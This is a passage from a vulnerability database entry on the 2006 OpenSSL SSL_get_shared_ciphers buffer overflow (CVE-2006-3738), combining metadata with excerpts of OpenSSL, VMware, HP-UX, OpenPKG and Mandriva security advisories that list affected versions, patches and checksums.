            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-01-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2007-01-16T00:00:00",
            "db": "BID",
            "id": "22083"
          },
          {
            "date": "2007-10-09T00:39:04",
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "date": "2006-10-04T00:44:50",
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "date": "2007-10-05T05:29:31",
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "date": "2006-10-04T01:20:54",
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "date": "2007-01-27T02:35:42",
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "date": "2011-05-10T00:45:11",
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "date": "2007-08-08T07:19:47",
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "date": "2006-10-25T21:37:36",
            "db": "PACKETSTORM",
            "id": "51324"
          },
          {
            "date": "2006-10-04T00:46:38",
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "date": "2001-10-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-01-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2008-05-20T23:05:00",
            "db": "BID",
            "id": "22083"
          },
          {
            "date": "2022-02-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "date": "2008-12-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200609-1114

    Vulnerability from variot - Updated: 2025-09-30 22:48

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. OpenSSL Security Advisory [28th September 2006]

    New OpenSSL releases are now available to correct four security issues.

    ASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)

    Vulnerability

    Dr. Henson recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory (CVE-2006-2937). (This issue did not affect OpenSSL versions prior to 0.9.7)

    1. Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack (CVE-2006-2940).

    Any code which uses OpenSSL to parse ASN.1 data from untrusted sources is affected. This includes SSL servers which enable client authentication and S/MIME applications.

    Acknowledgements

    The OpenSSL team thank Dr S. Henson of Open Network Security and NISCC for funding the ASN.1 test suite project. An attacker could send a list of ciphers to an application that uses this function and overrun a buffer (CVE-2006-3738).

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    SSLv2 Client Crash (CVE-2006-4343)

    Vulnerability

    A flaw in the SSLv2 client code was discovered.

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    Recommendations

    These vulnerabilities are resolved in the following versions of OpenSSL:

    • in the 0.9.7 branch, version 0.9.7l (or later);
    • in the 0.9.8 branch, version 0.9.8d (or later).

    OpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via HTTP and FTP from the following master locations (you can find the various FTP mirrors under https://www.openssl.org/source/mirror.html):

    o https://www.openssl.org/source/
    o ftp://ftp.openssl.org/source/
    

    The distribution file names are:

    o openssl-0.9.8d.tar.gz
      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa
      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2
    
    o openssl-0.9.7l.tar.gz
      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e
      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d
    

    The checksums were calculated using the following commands:

    openssl md5 openssl-0.9*.tar.gz
    openssl sha1 openssl-0.9*.tar.gz
    

    After upgrading make sure to recompile any applications statically linked to OpenSSL libraries and restart all applications that use OpenSSL. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256


                   VMware Security Advisory
    

    Advisory ID: VMSA-2007-0001 Synopsis: VMware ESX server security updates Issue date: 2007-01-08 Updated on: 2007-01-08 CVE: CVE-2006-3589 CVE-2006-2937 CVE-2006-2940 CVE-2006-3738 CVE-2006-4339 CVE-2006-4343 CVE-2006-4980


    1. Summary:

    Updated ESX Patches address several security issues.

    1. Relevant releases:

    VMware ESX 3.0.1 without patch ESX-9986131 VMware ESX 3.0.0 without patch ESX-3069097

    VMware ESX 2.5.4 prior to upgrade patch 3 VMware ESX 2.5.3 prior to upgrade patch 6 VMware ESX 2.1.3 prior to upgrade patch 4 VMware ESX 2.0.2 prior to upgrade patch 4

    1. Problem description:

    Problems addressed by these patches:

    a. Incorrect permissions on SSL key files generated by vmware-config (CVE-2006-3589):

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with the configuration program
    vmware-config which could set incorrect permissions on SSL key
    files. Local users may be able to obtain access to the SSL key
    files. The Common Vulnerabilities and Exposures project
    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue.
    

    b. OpenSSL library vulnerabilities:

    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131
    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d
    allows remote attackers to cause a denial of service (infinite
    loop and memory consumption) via malformed ASN.1 structures that
    trigger an improperly handled error condition.
    
    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,
    and earlier versions allows attackers to cause a denial of service
    (CPU consumption) via parasitic public keys with large (1) "public
    exponent" or (2) "public modulus" values in X.509 certificates that
    require extra time to process when using RSA signature verification.
    
    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8
    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1
    padding before generating a hash, which allows remote attackers to
    forge a PKCS #1 v1.5 signature that is signed by that RSA key and
    prevents OpenSSL from correctly verifying X.509 and other
    certificates that use PKCS #1.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,
    CVE-2006-4339, and CVE-2006-4343 to these issues.
    

    c. Updated OpenSSH package addresses the following possible security issues:

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by Patch ESX-3069097
    ESX 2.5.4: does not have these problems
    ESX 2.5.3: does not have these problems
    ESX 2.1.3: does not have these problems
    ESX 2.0.2: does not have these problems
    
    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly
    other versions, when using privilege separation, does not properly
    signal the non-privileged process when a session has been terminated
    after exceeding the LoginGraceTime setting, which leaves the
    connection open and allows remote attackers to cause a denial of
    service (connection consumption).
    
    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute
    arbitrary commands via filenames that contain shell metacharacters
    or spaces, which are expanded twice.
    
    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host
    access by numeric IP addresses and with VerifyReverseMapping
    disabled, allows remote attackers to bypass "from=" and "user@host"
    address restrictions by connecting to a host from a system whose
    reverse DNS hostname contains the numeric IP address.
    
    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1
    SSH protocol, allows remote attackers to cause a denial of service
    (CPU consumption) via an SSH packet that contains duplicate blocks,
    which is not properly handled by the CRC compensation attack
    detector.
    
    NOTE: ESX by default disables version 1 SSH protocol.
    
    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4
    allows remote attackers to cause a denial of service (crash), and
    possibly execute arbitrary code if GSSAPI authentication is enabled,
    via unspecified vectors that lead to a double-free.
    
    NOTE: ESX doesn't use GSSAPI by default.
    
    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege
    Separation Monitor in OpenSSH before 4.5 causes weaker verification
    that authentication has been successful, which might allow attackers
    to bypass authentication.
    
    NOTE: as of 20061108, it is believed that this issue is only
    exploitable by leveraging vulnerabilities in the unprivileged
    process, which are not known to exist.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,
    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues.
    

    d. Object reuse problems with newly created virtual disk (.vmdk or .dsk) files:

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with virtual disk (.vmdk or .dsk) files
    that are newly created, but contain blocks from recently deleted
    virtual disk files.  Information belonging to the previously
    deleted virtual disk files could be revealed in newly created
    virtual disk files.
    
    VMware recommends the following workaround: When creating new
    virtual machines on an ESX Server that may contain sensitive
    data, use vmkfstools with the -W option. This initializes the
    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w.
    

    e. Buffer overflow in Python function repr():

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by ESX-3069097
    ESX 2.5.4: does not have this problem
    ESX 2.5.3: does not have this problem
    ESX 2.1.3: does not have this problem
    ESX 2.0.2: does not have this problem
    
    A possible security issue with how the Python function repr()
    function handles UTF-32/UCS-4 strings.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the name CVE-2006-4980 to this issue.
    
    1. Solution:

    Please review the Patch notes for your version of ESX and verify the md5sum.

    ESX 3.0.1 http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html md5usm: 239375e107fd4c7af57663f023863fcb

    ESX 3.0.0 http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html md5sum: ca9947239fffda708f2c94f519df33dc

    ESX 2.5.4 http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html md5sum: 239375e107fd4c7af57663f023863fcb

    ESX 2.5.3 http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html md5sum: f90fcab28362edbf2311f3ca90cc7739

    ESX 2.1.3 http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f

    ESX 2.0.2 http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html md5sum: 925e70f28d17714c53fdbd24de64329f

    1. References:

    ESX 3.0.0 Patch URL: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html Knowledge base URL: http://kb.vmware.com/kb/3069097

    ESX 3.0.1 Patch URL: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html Knowledge base URL: http://kb.vmware.com/kb/9986131

    ESX 2.5.4 Patch URL: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html

    ESX 2.5.3 Patch URL: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html

    ESX 2.1.3 Patch URL: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html

    ESX 2.0.2 Patch URL: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980

    1. Contact:

    http://www.vmware.com/security

    VMware Security Response Policy http://www.vmware.com/vmtn/technology/security/security_response.html

    E-mail: security@vmware.com

    Copyright 2007 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE neFG0RikD74TCYeXKW6CBy4= =9/6k -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .


    References: [0] http://www.openssl.org/news/secadv_20060928.txt [1] http://www.openssl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG openpkg@openpkg.org" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c00849540 Version: 1

    HPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2007-01-17 Last Updated: 2007-01-23

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX.

    References: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969.

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01

    BACKGROUND

    AFFECTED VERSIONS

    For IPv4: HP-UX B.11.00 HP-UX B.11.11 =========== hpuxwsAPACHE action: install revision A.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    For IPv6: HP-UX B.11.11 =========== hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.23

    hpuxwsAPACHE action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    END AFFECTED VERSIONS

    RESOLUTION

    HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent.

    Apache Update Procedure

    Check for Apache Installation


    To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -I apache hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

    Stop Apache


    Before updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

    Download and Install Apache


    Download Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

    Removing Apache Installation


    The potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor's "swremove" command and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables. %ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

    MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product.

    PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

    HISTORY: rev.1 - 23 January 2007 Initial Release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2007 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    Updated Packages:

    Mandriva Linux 2006.0: 17e2d82c3f6c0afbf48eccbfbcc17b55 2006.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm 8c3f89e1900f069d4a4ad3162a9f7d78 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm 3a68c653ba0339ba99162459385c72e2 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm 8291bde3bd9aa95533aabc07280203b8 2006.0/i586/openssl-0.9.7g-2.4.20060mdk.i586.rpm 52b3fbfc1389bcd73e406d6ff741e9dc 2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm

    Mandriva Linux 2006.0/X86_64: b2ce6e6bb7e3114663d3a074d0cc7da5 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mdk.x86_64.rpm f7c8dbc2eda0c90547d43661454d1068 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mdk.x86_64.rpm 7c9ebd9f9179f4e93627dcf0f3442335 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.x86_64.rpm 17e2d82c3f6c0afbf48eccbfbcc17b55 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm 8c3f89e1900f069d4a4ad3162a9f7d78 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm 3a68c653ba0339ba99162459385c72e2 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm 6ce5832a59b8b67425cb7026ea9dc876 2006.0/x86_64/openssl-0.9.7g-2.4.20060mdk.x86_64.rpm 52b3fbfc1389bcd73e406d6ff741e9dc 2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm

    Mandriva Linux 2007.0: 1bfeff47c8d2f6c020c459881be68207 2007.0/i586/libopenssl0.9.8-0.9.8b-2.1mdv2007.0.i586.rpm 1e1a4db54ddfaedb08a6d847422099ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.1mdv2007.0.i586.rpm 59c80405f33b2e61ffd3cef025635e21 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.i586.rpm 3a6657970a2e7661bd869d221a69c8da 2007.0/i586/openssl-0.9.8b-2.1mdv2007.0.i586.rpm aad29e57ddceb66105af5d6434de9a62 2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: af679c647d97214244a8423dc1a766b7 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.1mdv2007.0.x86_64.rpm d7b1ed07df4115b3bcc3907e00d25a89 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm 5bd3ece2c0ec7a3201c29fa84e25a75a 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm 9b028020dba009eddbf06eeb8607b87f 2007.0/x86_64/openssl-0.9.8b-2.1mdv2007.0.x86_64.rpm aad29e57ddceb66105af5d6434de9a62 2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm

    Corporate 3.0: c99ea58f6f4959a4c36398cc6b2b4ee2 corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm 98a925c5ba2ecc9d704b1e730035755e corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.C30mdk.i586.rpm 151493a50693e3b9cc67bfafadb9ce42 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.i586.rpm 82b4709bdbb9128746887013a724356a corporate/3.0/i586/openssl-0.9.7c-3.6.C30mdk.i586.rpm a5bdbe6afa52005a734dc18aa951677d corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm

    Corporate 3.0/X86_64: 01a922d80d6fc9d1b36dde15ee27747e corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.6.C30mdk.x86_64.rpm 30268f0b70862d1f5998694ac8b4addc corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.6.C30mdk.x86_64.rpm e0388ff1efa34ea55d033e95b4e9bb63 corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.x86_64.rpm c99ea58f6f4959a4c36398cc6b2b4ee2 corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm 83759622f0cc8ea9c0f6d32671283354 corporate/3.0/x86_64/openssl-0.9.7c-3.6.C30mdk.x86_64.rpm a5bdbe6afa52005a734dc18aa951677d corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm

    Corporate 4.0: 6d71d2358738be9967b2dfe19d3642f1 corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm 22890554d3096ce596eeec7393ee3fcf corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 679fe740859fa35b2bb77b19c4a0e787 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm d8477333b67ec3a36ba46c50e6183993 corporate/4.0/i586/openssl-0.9.7g-2.4.20060mlcs4.i586.rpm b65dbbd9fb3d74d302478640476a2cd2 corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm

